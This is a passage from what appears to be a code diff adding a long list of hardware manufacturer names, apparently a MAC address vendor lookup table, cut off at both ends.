Inc.", + "Entrada Networks", + "INSIDE Technology A/S", + "Gigalabs, Inc.", + "Patapsco Designs", + "Lucent Technologies Taiwan Telecommunications Co., Ltd.", + "VideoServer, Inc.", + "Intelligent Devices Inc. (Idi)", + "B&R Industrial Automation GmbH", + "Scanivalve Corp.", + "LINX Data Terminals, Inc.", + "Resilience Corporation", + "Cycle Computer Corporation, Inc.", + "Edec Co., Ltd.", + "Orckit Communications Ltd.", + "Shomiti Systems Incorporated", + "QuVis, Inc.", + "Acer Netxus Inc.", + "Phast Corporation", + "Tks (Usa), Inc.", + "Mainstream Data, Inc.", + "Njk Techno Co.", + "Peak Audio", + "Exp Computer, Inc.", + "Wyle Electronics", + "Netro Corp.", + "Emtrak, Incorporated", + "Clarion Corporation Of America", + "Artiza Networks Inc", + "Active Imaging Plc", + "MICROSENS GmbH & CO. KG", + "Village Tronic Entwicklung", + "The Panda Project", + "Electronic Retailing Systems International", + "Integrated Circuit Systems, Inc. Communications Group", + "Syslogic Datentechnik Ag", + "Micropolis Corp.", + "Questech, Ltd.", + "Hamilton Hallmark", + "Ross Technology, Inc.", + "Marconi Spa", + "Fuji Automation Co., Ltd.", + "Liberty Technology Networking", + "Dcs Ag", + "Softlab, Inc.", + "Digital Logic GmbH", + "Saic Ideas Group", + "Image Sciences, Inc.", + "Xyplex, Inc.", + "SBE, Inc.", + "Brand Communications, Ltd.", + "Wms Industries", + "LANCOM Systems GmbH", + "Commvision Corp.", + "Austron, Inc.", + "Patton Electronics Co.", + "3H Technology", + "Eda Instruments, Inc.", + "Amber Wave Systems, Inc.", + "Est Corporation", + "Aes Prodata", + "Nucom Systems, Inc.", + "Cardware Lab, Inc.", + "Epic Data Inc.", + "Fujitsu Denso Ltd.", + "Centre For Development Of Advanced Computing", + "Digital Link Corp.", + "Ntt It Co., Ltd.", + "Mutoh Industries Ltd.", + "Sanritz Automation Co., Ltd.", + "Alps Electric (Usa), Inc.", + "Jacomo Corporation", + "Check Point Software Technologies", + "Radguard Ltd.", + "Dataplex Pty Ltd", + "Digitech Industries, Inc.", + "Johnathon Freeman Technologies", + "Bintec Communications Gmbh", + "Siemens Switzerland Ltd., I B T HVP", + "Node Runner, Inc.", + "Comtech Research Inc.", + "Alcatel Taisel", + "Dantel", + "NMS Communications", + "Ornet Data Communication Tech.", + "Ericsson Television Limited", + "Dms Dorsch Mikrosystem Gmbh", + "Captor Nv/Sa", + "Simple Technology", + "Gde Systems, Inc.", + "Vme Microsystems International Corporation", + "Miro Computer Products Ag", + "Synergy (Uk) Ltd.", + "Hectronic Ab", + "Itv Technologies, Inc.", + "Rotec Industrieautomation Gmbh", + "Mikron Gmbh", + "Pandatel Ag", + "Sungwoon Systems", + "Eurotime Ab", + "West Egg Systems, Inc.", + "Isdyne", + "Larscom Incorporated", + "Tutankhamon Electronics", + "Risq Modular Systems, Inc.", + "Inet,Inc.", + "NSSLGlobal Technologies AS", + "B&W Nuclear Service Company", + "Lippert Automationstechnik", + "Primary Access Corp.", + "Data Race, Inc.", + "Digital Bi0metrics Inc.", + "Multipoint Networks", + "Verilink Corporation", + "Wisdm Ltd.", + "Center For High Performance", + "Acuson Computed Sonography", + "Comstat Datacomm Corporation", + "Gespac, S.a.", + "Mitec, Inc.", + "Densitron Taiwan Ltd.", + "Adastra Systems Corp.", + "Canopus Co., Ltd.", + "Universal Microelectronics Co.", + "T3plus Networking, Inc.", + "GarrettCom, Inc.", + "Tokyo Denshi Sekei Co.", + "Netwiz", + "Unimicro Systems, Inc.", + "Data Link Corp. Ltd.", + "Digital Transmission Systems", + "Advanced Logic Research, Inc.", + "Myson Technology, Inc.", + "Netstar, Inc.", + "Isolation Systems, Ltd.", + "Nixdorf Computer Corp.", + "M/A-Com Inc. Companies", + "S.e.r.c.e.l.", + "Logic Replacement Tech. Ltd.", + "HVE, Inc.", + "Priva B.v.", + "Boca Research, Inc.", + "Array Technology Ltd.", + "Kt Technology (S) Pte Ltd", + "Metrodata Ltd.", + "Multiaccess Computing Corp.", + "Moore Products Co.", + "Yoshiki Industrial Co.,Ltd.", + "Eos Technologies, Inc.", + "Tower Tech S.r.l.", + "Grand Junction Networks, Inc.", + "Sectra Secure-Transmission Ab", + "Knx Ltd.", + "Towercom Co. Inc. Dba Pc House", + "J1 Systems, Inc.", + "Celan Technology Inc.", + "Infinite Networks Ltd.", + "Teklogix Inc.", + "Shinko Electric Co., Ltd.", + "Diatek Patient Managment", + "Interlink System Co., Ltd.", + "Calcomp, Inc.", + "Chuntex Electronic Co., Ltd.", + "Alcatel - Sel", + "Haft Technology, Inc.", + "About Computing Inc.", + "Photonics Corporation", + "Corometrics Medical Systems", + "HME Clear-Com LTD.", + "Universal Data Systems", + "Newgen Systems Corp.", + "Andover Controls Corporation", + "Ergo Computing", + "Mannesmann Scangraphic Gmbh", + "Minim Inc.", + "ADC - Global Connectivity Solutions Division", + "Kentek Information Systems,Inc", + "Pivotal Technologies, Inc.", + "Laboratory Equipment Corp.", + "Performance Technologies, Inc.", + "Pinnacle Data Systems, Inc.", + "Lauterbach GmbH", + "Stealth Computer Systems", + "Imf International Ltd.", + "Interware Co., Ltd.", + "Super Workstation, Inc.", + "Engage Communication, Inc.", + "Atomwide Ltd.", + "Fukuda Denshi Co., Ltd.", + "Lemcom Systems, Inc.", + "Chuo Electronics Co., Ltd.", + "Datacom Inc.", + "Quin Systems Ltd", + "Procomp Industria Eletronica", + "Plain Tree Systems Inc", + "Tps Teleprocessing Sys. Gmbh", + "Lxe", + "Microboards, Inc.", + "Apt Communications, Inc.", + "Eri (Empac Research Inc.)", + "Gvc Corporation", + "Synerjet International Corp.", + "Ssangyong Computer Systems", + "Comsoft Gmbh", + "Pci Componentes Da Amzonia Ltd", + "Copernique", + "Ampro Computers", + "Data Research & Applications", + "Lsi Logic Corporation", + "Network Interface Corporation", + "Itautec Philco S.a.", + "Kla Instruments Corporation", + "Goldstar Information & Comm.", + "Ntt Data Comm. Systems Corp.", + "Quantel Ltd", + "Arche Technoligies Inc.", + "Honeywell International Inc", + "General Micro Systems, Inc.", + "Via Technologies, Inc.", + "Tradpost (Hk) Ltd", + "Litton Systems, Inc.", + "Bicc Information Systems & Svc", + "Systech Computer Corp.", + "Compuadd Corporation", + "Summit Microsystems Corp.", + "Nokia Siemens Networks GmbH & Co. KG.", + "North Hills Israel", + "Fibercom, Inc.", + "Tokyo Electric Co.,Ltd", + "Commscraft Ltd.", + "Telemecanique Electrique", + "Dacoll Limited", + "Falco Data Products", + "Dlog Nc-Systeme", + "Interface Co.", + "Xinetron, Inc.", + "T.d.i. Co., Ltd.", + "Reflex Manufacturing Systems", + "Amdahl", + "Cyclone Microsystems, Inc.", + "Csk Corporation", + "Kobe Steel, Ltd.", + "Justsystem Corporation", + "Adc Codenoll Technology Corp.", + "Chase Research Ltd.", + "Surigiken Co., Ltd.", + "Nissin Electric Co., Ltd.", + "Lanex Corporation", + "Hitachi Engineering Co., Ltd", + "Mcnc", + "Scan-Optics", + "Televideo Systems, Inc.", + "Network Designers, Ltd.", + "Sigmex Ltd.", + "Cayman Systems Inc.", + "Camtec Electronics Ltd.", + "Dove Computer Corporation", + "Spider Communications", + "Densan Co., Ltd.", + "Vitacom Corporation", + "EMS Aviation, Inc.", + "Gmx Inc/Gimix", + "Bvm Limited", + "British Telecommunications plc", + "Madge Ltd.", + "Applied Microsystems Corp.", + "Syntrex, Inc.", + "Solbourne Computer, Inc.", + "Hayes Microcomputer Products", + "Barco Control Rooms Gmbh", + "Sophia Systems", + "Dy-4 Incorporated", + "RYOSEI, Ltd.", + "Societe Evira", + "Ampex Corporation", + "Information Presentation Tech.", + "Meiko", + "Allied Telesis Labs Ltd", + "Yamatech Scientific Ltd.", + "Cray Communications, Ltd.", + "Atex", + "Xylogics Inc", + "SANYO Electric Co., Ltd.", + "Western Digital Corporation", + "Egan Machinery Company", + "Upnod Ab", + "Micro Technology", + "Network General Corporation", + "Normerel Systemes", + "Waters Div. Of Millipore", + "Bay Networks", + "Microprocess", + "Gateway Communications", + "Acorn Computers Limited", + "Tcl Incorporated", + "Dassault Electronique", + "Interphase Corporation", + "Mtx, Inc.", + "Prodigy Systems Corporation", + "Sytek Inc.", + "Matsushita Comm. Ind. Co. Ltd.", + "Pixel Computer Inc.", + "Concurrent Computer Corp.", + "Torus Systems Limited", + "Schlumberger Well Services", + "Filenet Corporation", + "Intergraph Corporation", + "Bausch & Lomb", + "Network Research Corporation", + "Little Machines Inc.", + "Amalgamated Wireless(Aus) Ltd", + "Carnegie-Mellon University", + "Megatek Corporation", + "Counterpoint Computer Inc.", + "Stanford Linear Accel. Center", + "Eurotherm Gauging Systems", + "Cygnet Systems", + "Daisy Systems Corp.", + "Metaphor Computer Systems", + "Digital Equipment Corporation", + "Dansk Data Electronik", + "Accell Corporation", + "Whitechapel Computer Works", + "Locus Computing Corporation", + "High Level Hardware", + "Mitel Corporation", + "Compucorp", + "Nestar Systems Incorporated", + "Xerox Corporation", + "Ungermann-Bass Inc.", + "Pirelli Focom Networks", + "Kdd-Kokusai Debnsin Denwa Co.", + "Sonoma Systems", + "Standard Microsystems", + "Sysgen", + "Thomas Conrad Corp.", + "Clear Align LLC", + "Crossmatch Technologies/HID Global", + "GreenTrol Automation", + "Arcade Communications Ltd.", + "Shenzhen Zhongruixin Intelligent Technology Co., Ltd.", + "Vogl Electronic GmbH", + "Baylan Olcu Aletleri San. ve Tic.A.S.", + "InnoXings Co., LTD.", + "X-speed lnformation Technology Co.,Ltd", + "Satcom Direct, Inc.", + "Nothing Technology Limited", + "ShenZhen Hosecom Electronic Technology Co.,LTD", + "Commtact Ltd", + "Dopple B.V.", + "Hirschmann Automation and Control GmbH", + "BDR Thermea Group B.V", + "Lantronix", + "Citadel Wallet LLC", + "Eurotech S.p.A.", + "Sz Dji Technology Co.,Ltd", + "Shenzhen Water World Information Co.,Ltd.", + "sunweit industrial limited", + "Omnivision", + "Balluff MV GmbH", + "Hefei Linkin Technology Co., Ltd.", + "Shenzhen C-Data Technology Co., Ltd.", + "Zhejiang HuaRay Technology Co.,Ltd", + "Ubihere", + "ONE Investment Group Limited", + "Shenzhen Mercury Communication Technologies Co.,Ltd.", + "Sunitec Technology Co.,Limited", + "Wavarts Technologies Co., Ltd", + "Shenzhen Yisheng Technology Co.,Ltd", + "Mcot Inc.", + "Cannice", + "Shenzhen Shlink.co.,Limited", + "Ghost Autonomy Inc.", + "JOYNED GmbH", + "Tracklab Inc", + "Nestle Purina PetCare", + "Phyplus Technology (Shanghai) Co., Ltd", + "TeraNXT Global India Pvt Ltd.", + "Fcnt Llc", + "Hangzhou Huacheng Network Technology Co.,Ltd", + "Edifier International", + "Impulse Labs", + "Shenzhen Neoway Technology Co.,Ltd.", + "Gantner Electronic GmbH", + "Zeasn Technology Private Limited", + "Great Talent Technology Limited", + "Cig Shanghai Co Ltd", + "Hangzhou RunZhou Fiber Technologies Co.,Ltd", + "Sidora Srl", + "Logitech Far East", + "Alignment Engine Inc.", + "Suzhou HYC technology Co., Ltd.", + "Zpt R&D", + "nexzo india pvt ltd", + "Huaqin Technology Co.LTD", + "Valenco GmbH", + "Dropbeats Technology Co., Ltd.", + "Marelli Europe s.p.a.", + "Infiniband Trade Association", + "Hewlett Packard Enterprise", + "Vantiva Connected Home - Technologies Telco", + "AltoBeam Inc.", + "Shenzhen VMAX Software Co., Ltd.", + "Idesco Oy", + "Paul Vahle GmbH & Co. KG", + "Dixon Electro Appliances Pvt Ltd", + "Accelerated Memory Production Inc.", + "STMicroelectronics Rousset SAS", + "Chicony Electronics Co., Ltd.", + "SharkNinja Operating LLC", + "Leapmotor (Jinhua) New Energy Vehicle Parts Technology Co., Ltd.", + "Prama Hikvision India Private Limited", + "Schneider Electric", + "Glowforge Inc", + "Lightspeed Technologies Inc.", + "OVT India pvt Ltd", + "Guangzhou V-Solution Telecommunication Technology Co.,Ltd.", + "Titan Products Ltd.", + "ambie corporation", + "BitRecords GmbH", + "EMH Metering GmbH & Co. KG", + "Lithiunal Energy", + "Valeo Auto- Electric Hungary Ltd", + "Lierda Science & Technology Group Co., Ltd", + "LCFC(Hefei) Electronics Technology co., ltd", + "Sepura Limited", + "Continental Automotive Romania SLR", + "Q-Free America, Inc.", + "Lontium Semiconductor Corporation", + "Akebono Brake Industry Co.,Ltd.", + "Walter Kidde Portable Equipment, Inc.", + "Suteng Innovation Technology Co., Ltd.", + "Palltronics, Inc.", + "Plucent AB", + "Arcelik A.S", + "Zenitel GB Ltd", + "Oraimo Technology Limited", + "Shenzhenshi Xinzhongxin Technology Co.Ltd", + "Unionman Technology Co.,Ltd", + "Rentokil Initial", + "GX India Pvt Ltd", + "Xiamenshi C-Chip Technology Co.,Ltd", + "Ubiqcom India Pvt Ltd", + "Mimosa Networks", + "Antonios A. Chariton", + "Actions Microelectronics", + "GE Lighting", + "Vietnam Post And Telecommunication Industry Technology Join Stock Company", + "LG Electornics", + "Positivo Tecnologia S.A.", + "Hanshow Technology Co.,Ltd.", + "Mobiwire Mobiles(Ningbo) Co.,Ltd", + "Tonly Technology Co. Ltd", + "Amada Co., Ltd", + "ModuVision Technologies", + "Shenzhen iComm Semiconductor CO.,LTD", + "Verifone, Inc.", + "shenzhen trolink Technology Co.,Ltd", + "Jiangxi Risound Electronics Co.,LTD", + "SenArch ApS", + "Hangzhou Lanly Technology Co., Ltd.", + "Tianjin HuaLai Technology CO., Ltd.", + "Cresyn", + "Huizhou Desay SV Automotive Co., Ltd.", + "Hughes Network Systems, LLC", + "tonies GmbH", + "Sigmastar Technology Ltd.", + "LeoLabs", + "iRobot Corporation", + "CompuSoft A/S", + "Commscope", + "EYESON SOLUTION CO.,Ltd", + "Shenzhen Taichi Technology Limited", + "Tokyo Electron Device Limited", + "Hitachi Rail GTS Deutschland GmbH", + "Shenzhen Electrical Appliances Co.", + "ASL Xiamen Technology CO., LTD", + "Pinewave Pte. Ltd.", + "Altice Labs", + "Telink Micro LLC", + "Lacroix", + "HangZhou Atuo Future Technology Co., Ltd", + "IEC Technologies S. de R.L de C.V.", + "Powerful Devices", + "Technoalpin", + "Qingdao Goertek Horizons Tecnology Co.,LTD", + "Wachendorff Automation GmbH & CO.KG", + "Indisr Communication Services And Technologies India", + "Sierra Wireless, ULC", + "Variscite LTD", + "Cambridge Mobile Telematics, Inc.", + "Roamwifi Technology(Hk) Limited", + "shenzhen worldelite electronics co., LTD", + "浙江路川科技有限公司", + "Demant Enterprise A/S", + "HongKong Tenry Technology Co., Ltd.", + "Eliyan Corp.", + "Speedtech Corp.", + "Xtreme Testek Inc.", + "Icotera A/S", + "Ic Boss.com Tech Inc", + "Zhejiang Weilai Jingling Artificial Intelligence Technology Co., Ltd.", + "Kohler Ventures, Inc.", + "KOKUSAI DENKI Electric Inc.", + "TCL Yuxin Zhixing Technology (Huizhou) Co.,Ltd", + "Ehya LTD", + "Bubendorff SAS", + "Hive", + "Mrc Inc.", + "Continental Automotive Systems S.R.L", + "RealNetworks", + "Beijing Wisdomstar Technology Co., Ltd", + "i-PRO Co., Ltd.", + "Powertek Limited", + "Shenzhen New Chip Intelligence Co.,LTD", + "Symbotic LLC", + "FIXME GmbH", + "Meta Platforms, Inc.", + "Hangzhou Ezviz Software Co.,Ltd.", + "DGS Diagnostics A/S", + "Ulak Communications Inc.", + "Shenzhen Kean Digital Co.,Ltd", + "TP-Link Systems Inc", + "Zhejiang Uniview Technologies Co.,Ltd.", + "Ningbo Zhixiang Technology Co., Ltd", + "Shanghai Lixun Information Technology Co., Ltd.", + "Guangdong Jeton International Tech Ltd.", + "Nanjing Jiahao Technology Co., Ltd.", + "SJIT Co., Ltd.", + "Dreame Technology (Suzhou) Limited", + "Zhejiang Dahua Technologyco.,Ltd", + "Luxottica Tristar (Dongguan) Optical Co.,Ltd", + "GigaDevice Semiconductor Inc.", + "Sercomm Philippines Inc", + "Home Control Singapore Pte Ltd", + "Analogue Enterprises Limited", + "Mercusys Technologies Co., Ltd.", + "Zhen Shi Information Technology(Shanghai)Co.,Ltd.", + "RainX PTE. LTD.", + "VusionGroup", + "Shenzhen Tianruixiang Communication Equipment Co.,Ltd", + "AVM Audiovisuelles Marketing und Computersysteme GmbH", + "Mellanox Technologies, Inc.", + "China Mobile Group Device Co.,Ltd.", + "Shenzhen MiaoMing Intelligent Technology Co.,Ltd", + "Dongguan Huayin Electronic Technology Co., Ltd.", + "Miwa Lock Co.,Ltd.", + "Netcraze Llc", + "Shenzhen Ruiyuanchuangxin Technology Co.,Ltd.", + "Shenzhen Xinwei Intelligent Co., Ltd", + "F5 Inc.", + "Vital link vietnam company limited", + "Funshion Online Technologies Co.,Ltd", + "WaveGo Tech LLC", + "Budderfly Inc.", + "Equal Optics, LLC", + "JoulWatt Technology Co., Ltd", + "Handheld Scientific, Inc.", + "Brother Industries, LTD.", + "Nautitech Mining Systems Pty. Ltd.", + "Xi'an Molead Technology Co., Ltd", + "Nokia Solutions and Networks India Private Limited", + "Pleneo", + "Voyetra Turtle Beach, Inc.", + "Ela Innovation", + "Clourney Semiconductor", + "Beamtrail-Sole Proprietorship", + "Canopy Growth Corp", + "Beijer Electronics Corp.", + "FUJIFILM Corporation", + "Osmozis", + "Shenzhen Shokz Co., Ltd.", + "Cosonic Electroacoustic Technology Co., Ltd.", + "OptiCore Inc.", + "Aptiv Services Us, Llc", + "Infinite Clouds", + "BrewLogix, LLC", + "Hangzhou Prevail Communication Technology Co., Ltd", + "Astra Wireless Technology FZ-LLC", + "SJI Industry Company", + "P4q Electronics, S.l.", + "Miraeil", + "Shenzhen MEK Intellisys Pte Ltd", + "Jiangxi Remote lntelligence Technology Co.,Ltd", + "Chaoyue Technology Co., Ltd.", + "HG Genuine Intelligent Terminal (Xiaogan) Co.,Ltd.", + "Shenzhen E-Superlink Technology Co., Ltd", + "Movesense Ltd", + "Dixon Technologies (India) Limited", + "Ce Link Limited", + "Valeo Vision Systems", + "Matrox Central Services Inc", + "Avlinkpro", + "GOIP Global Services Pvt. Ltd.", + "Shanghai Amphenol Airwave Communication Electronics Co.,Ltd.", + "Fujian Youyike Technology Co.,Ltd", + "Nidec Instruments Corporation", + "Shenzhen Feasycom Co., Ltd", + "Liquid-Markets GmbH", + "Guangxi Hesheng Electronics Co., Ltd.", + "Paradromics, Inc.", + "KunGao Micro (JiangSu) Co., LTd", + "Hangzhou Dangbei Network Technology Co., Ltd", + "Advanced Micro Devices, Inc.", + "Valeo Telematik und Akustik GmbH", + "hangzhou puwell cloud tech co., ltd.", + "Novea Energies", + "Shenzhen Hi-Link Electronic CO.,Ltd.", + "Jiangxi Xunte Intelligent Terminal Co., Ltd", + "Teltonika Networks Uab", + "WiSA Technologies Inc", + "Union Man Technology Co.,Ltd", + "CubePilot Pty Ltd", + "ShenZhen Elsky Technology Co.,LTD", + "Merytronic 2012, S.L.", + "Zhuhai Yunmai Technology Co.,Ltd", + "Telenor Connexion AB", + "Nanjing Qinheng Microelectronics Co., Ltd.", + "Axon Networks Inc.", + "Keyence Corporation", + "Hitachi Energy Germany AG", + "Bitnetworks Co.,Ltd", + "Gertec Brasil Ltda", + "Shenzhen Allywll", + "ScaleFlux", + "Shanghai Chint low voltage electrical technology Co.,Ltd.", + "Nex-T LLC", + "LLC NTC Rotek", + "Semikron Elektronik GmbH & Co. KG", + "Veratron AG", + "Metal Work SpA", + "Qingdao Hisense Smart Life Technology Co., Ltd", + "GloquadTech", + "Netberg", + "Xiamen Milesight IoT Co., Ltd.", + "Daeyoung Electronics", + "niliwi nanjing big data Co,.Ltd", + "Green Energy Options Ltd", + "Shanghai InfoTM Microelectronics Co.,Ltd", + "PLATH Signal Products GmbH & Co. KG", + "Smartbridges Pte. Ltd.", + "Pimax Technology(ShangHai)Co.,Ltd", + "Valeo Detection Systems", + "Luna Products", + "HYBE Co.,LTD", + "Ampere Computing Llc", + "ABL GmbH", + "Robert Bosch Elektronikai Kft.", + "Hubei Yuan Times Technology Co.,Ltd.", + "Drimaes Inc.", + "New H3C Intelligence Terminal Co., Ltd.", + "Orion Nova, S.l.", + "Cherry GmbH", + "Serrature Meroni SpA", + "BLU Products Inc", + "eSystems MTG GmbH", + "Ergatta", + "ACE Antenna Co., ltd", + "Yufei Innovation Software(Shenzhen) Co., Ltd.", + "Beijing Flitlink Vientiane Technology Co., LTD", + "Shenzhen Excelsecu Data Technology Co.,Ltd", + "Ai Technology Co.,Ltd.", + "BELIMO Automation AG", + "CoolBitX Ltd.", + "Zowee Technology(Heyuan) Co., Ltd.", + "twareLAB", + "Mikami & Co., Ltd.", + "Toradex AG", + "Tokyoshuha Co.,Ltd.", + "Shenzhen Terca Information Technology Co., Ltd.", + "Axiado Corporation", + "Digital Watchdog", + "amitek", + "Infiniti Electro-Optics", + "Logitech", + "Choung Hwa Tech Co.,Ltd", + "meerecompany", + "SmartCow AI Technologies Taiwan Ltd.", + "ShenZhen MovingComm Technology Co., Limited", + "Sintela Ltd", + "Crenet Labs Co., Ltd.", + "Analog Systems", + "Withings", + "Guangdong ACIGA Science&Technology Co.,Ltd", + "Solidigm Technology", + "Broadex Technologies Co.ltd", + "Shenzhen Sei Robotics Co.,Ltd", + "Gold&Water Industrial Limited", + "Wuxi Stars Microsystem Technology Co., Ltd", + "Shanghai Longcheer Technology Co., Ltd.", + "Amlogic, Inc.", + "Baytec Limited", + "Foxconn Interconnect Technology", + "ConMet", + "Vecima Networks Inc.", + "Shennan Circuits Co.,Ltd", + "Shenzhen Tian Xing Chuang Zhan Electronic Co.,Ltd", + "AiVIS Co., Itd.", + "Hangzhou Hikrobot Technology Co., Ltd.", + "Comcast Cable Corporation", + "Laird Connectivity", + "Square Route Co., Ltd.", + "Belden Singapore Pte. Ltd.", + "Preferred Robotics, Inc.", + "essensys plc", + "Futecho Solutions Private Limited", + "Jiangsu Xinsheng Intelligent Technology Co., Ltd.", + "Ehoome Iot Private Limited", + "SKG Health Technologies Co., Ltd.", + "Granite Microsystems", + "Shanghai SIMCOM Ltd.", + "Hunan Danuo Technology Co.,LTD", + "Elektrik Uretim AS EOS", + "Shenzhen Onega Technology Co.,Ltd", + "China Grand Communications Co.,Ltd.", + "8Mesh Networks Limited", + "Rootech, Inc.", + "Telways Communication Co., Ltd.", + "Xuzhou WIKA Electronics Control Technology Co., Ltd.", + "Union Image Co.,Ltd", + "Huwell Technology Inc.", + "Weigao Nikkiso(Weihai)Dialysis Equipment Co.,Ltd", + "ASRock Incorporation", + "Hefei Datang Storage Technology Co.,Ltd", + "Dryad Networks GmbH", + "Ibtek Inc.", + "Aerospace new generation communications Co.,Ltd", + "Peplink International Ltd.", + "Cesnet", + "SHENZHEN IK WORLD Technology Co., Ltd", + "Verana Networks", + "TireCheck GmbH", + "Erbe Elektromedizin GmbH", + "Powervision Tech Inc.", + "Changhong (Hongkong) Trading Limited", + "The Silk Technologies ILC LTD", + "AITelecom", + "Constell8 Nv", + "Vietnam Post And Telecommunication Industry Technology Joint Stock Company", + "Mitel Networks Corporation", + "Nebra Ltd", + "YEESTOR Microelectronics Co., Ltd", + "Shenzhen Apical Technology Co., Ltd", + "Shenzhen Xinghai Iot Technology Co.,Ltd", + "Pivotal Optics", + "Tenstorrent Inc", + "Zaklady Elektroniki i Mechaniki Precyzyjnej R&G S.A.", + "Leonardo UK Ltd", + "Beijing Sinead Technology Co., Ltd.", + "Eacem", + "Chengdu ChipIntelli Technology Co., Ltd", + "EXARA Group", + "Shenzhen Trolink Technology CO, LTD", + "China Post Communications Equipment Co., Ltd.", + "TPV Display Technology(Xiamen) Co.,Ltd.", + "Wanbang Digital Energy Co.,Ltd", + "LongSung Technology (Shanghai) Co.,Ltd.", + "Greatek", + "Shenzhen Shunrui Gaojie Technology Co., Ltd.", + "Shenzhen Unionmemory Information System Limited", + "MOKO TECHNOLOGY Ltd", + "Shenzhen Jiapeng Huaxiang Technology Co.,Ltd", + "Landis + Gyr", + "Team Group Inc", + "ZheJiang FuChunJiang Information Technology Co.,Ltd", + "Wizardlab Co., Ltd.", + "Shenzhen iStartek Technology Co., Ltd.", + "Trebing & Himstedt Prozeßautomation GmbH & Co. KG", + "Tipping Point Technologies, Inc.", + "STMicrolectronics International NV", + "Sleep Number", + "Whisker Labs - Ting", + "Rapidmax Technology Corporation", + "Dragos, Inc.", + "SaiNXT Technologies LLP", + "Guangzhou Xingyi Electronic Technology Co.,Ltd", + "Withrobot Inc.", + "Chengdu Kt Electronic Hi-Tech Co.,Ltd", + "Shenzhen Xiao Bi En Culture Education Technology Co.,Ltd.", + "Sfr", + "Nilfisk A/S", + "Maxio Technology (Hangzhou) Ltd.", + "Wistron INFOCOMM (Zhongshan) CORPORATION", + "Meld Technology, Inc", + "Imagine Marketing Private Limited", + "Cloud Diagnostics Canada ULC", + "B Meters S.r.l.", + "SAMJIN Co., Ltd.", + "Funai Electric Co., Ltd.", + "Bt9", + "Physik Instrumente GmbH & Co. KG", + "CSL Dualcom Ltd", + "iSYS RTS GmbH", + "Tianyi Telecom Terminals Company Limited", + "Huizhou Boshijie Technology Co.,Ltd", + "Quext, LLC", + "Safetrust Inc", + "TRIZ Networks corp.", + "Netscout Systems Inc", + "Dayouplus", + "Shenzhen Olanboa Technology Co., Ltd", + "Marvell Semiconductors", + "Shenzhen Huanhu Technology Co.,Ltd", + "Cloudtronics Pty Ltd", + "Nanjing Cocomm electronics co., LTD", + "Juice Technology AG", + "Intellivision Holdings, LLC", + "ThingsMatrix Inc.", + "Dongguan Huarong Communication Technologies Co.,Ltd.", + "Itronic Technology Co . , Ltd .", + "Betop Techonologies", + "Prama India Private Limited", + "Continental", + "SensorPush", + "Hong Technologies", + "IGShare Co., Ltd.", + "Dongguan Cannice Precision Manufacturing Co., Ltd.", + "OctoGate IT Security Systems GmbH", + "SD Biosensor", + "Dematic Corp", + "Dusun Electron Co.,Ltd.", + "Aurender Inc.", + "Zhuhai Dingzhi Electronic Technology Co., Ltd", + "SOLARWATT GmbH", + "Raydium Semiconductor Corp.", + "LEGO System A/S", + "FibRSol Global Network Limited", + "Shenzhen Xinyin technology company", + "Peerless Instrument Division of Curtiss-Wright", + "Jiangsu Hengtong Optic-Electric Co., LTD", + "SK Networks Service CO., LTD.", + "Virtuozzo International GmbH", + "Optical Networks, Inc.", + "Beijing Vrv Software Corpoaration Limited.", + "Ouen Co.,Ltd.", + "E Focus Instruments India Private Limited", + "mMax Communications, Inc.", + "JUNGJIN Electronics Co.,Ltd", + "Andrea Informatique", + "Kyeungin CNS Co., Ltd.", + "Senscomm Semiconductor Co., Ltd.", + "APRESIA Systems, Ltd.", + "Feng mi(Beijing)technology co., LTD", + "AFE Inc.", + "Beijing Eswin Computing Technology Co., Ltd", + "Saab Danmark A/S", + "Teal Drones, Inc.", + "Xunison Ltd.", + "Chengdu Vision-Zenith Tech.Co,.Ltd", + "HANGZHOU DANGBEI NETWORK TECH.Co.,Ltd", + "Shenzhen Technewchip Technology Co.,Ltd.", + "Shenzhen Honesty Electronics Co.,Ltd.", + "ShenZhen EepuLink Co., Ltd.", + "mPHASE Technologies, Inc.", + "70mai Co.,Ltd.", + "Printronix, Inc.", + "Wahoo Fitness", + "EnergyHub", + "Dialog Semiconductor Hellas SA", + "Shenzhen Yingdakang Technology CO., LTD", + "Ficer Technology", + "Aimore Acoustics Incorporation", + "Xi'an Zhisensor Technologies Co.,Ltd", + "Shenzhen WiSiYiLink Technology Co.,Ltd", + "1More", + "Shenzhen HS Fiber Communication Equipment CO., LTD", + "Aipon Electronics Co., Ltd", + "TCL MOKA International Limited", + "Wiwynn Corporation Tainan Branch", + "Pixel Power Ltd.", + "Casa Systems", + "Technical Research Design and Development", + "Xiamen Sigmastar Technology Ltd.", + "Nutanix", + "Lite-On Network Communication (Dongguan) Limited", + "Benchmark Electronics", + "MIRAE ITS Co.,LTD.", + "Chung-Hsin Electric & Machinery Mfg.corp.", + "Owl Cyber Defense Solutions, LLC", + "Axiom Memory Solutions, Inc.", + "Foshan VIOMI Electric Appliance Technology Co. Ltd.", + "ARtem", + "Solid Optics EU N.V.", + "Squirrels Research Labs LLC", + "Luxottica Group S.p.a.", + "Shenzhen Qihoo Intelligent Technology Co.,Ltd", + "iZotope", + "Oxide Computer Company", + "Sweroam", + "Kenstel Networks Limited", + "DERA Co., Ltd", + "Continental Automotive Czech Republic s.r.o.", + "Diagraph Corporation", + "Innonet", + "Hunan Goke Microelectronics Co.,Ltd", + "Heinzinger electronic GmbH", + "Temic Automotive Philippines Inc.", + "Nc&C", + "Kumho Electric Inc.", + "ScioTeq bvba", + "SOLAR controls s.r.o.", + "Fibocom Wireless Inc.", + "SUMEC Machinery & Electric Co.,Ltd.", + "Alamar Electronics", + "Hamee Corp.", + "Huizhou Foryou General Electronics Co., Ltd.", + "Hansgrohe", + "Ynomia Pty Ltd", + "MeteRSit S.R.L.", + "China Mobile Iot Limited company", + "Audiowise Technology Inc.", + "Radio Bridge", + "iodyne", + "BRK Brands, Inc.", + "Zitte corporation", + "Dish Technologies Corp", + "Alcatel-Lucent Enterprise (China)", + "OktoInform RUS", + "Smt Telecomm Hk", + "Shanghai Embedway Information Technologies Co.,Ltd", + "Yichip Microelectronics (Hangzhou) Co.,Ltd", + "MIMO TECH Co., Ltd.", + "Zhuhai Unitech Power Technology Co., Ltd.", + "Shanghai Cambricon Information Technology Co., Ltd.", + "Aurora Innovation Inc.", + "Boston Dynamics", + "Jusan, S.a.", + "Controlled Environments, Ltd.", + "Shanghai Moaan Intelligent Technology Co.,Ltd", + "Parama Networks Inc", + "Grotech Inc", + "NexFi", + "Shanghai Listent Medical Tech Co., Ltd.", + "Primera Technology, Inc.", + "WAMA Technology Limited", + "Hunan Scrown Electronic Information Tech.co.,Ltd", + "Teletrol Systems, Inc.", + 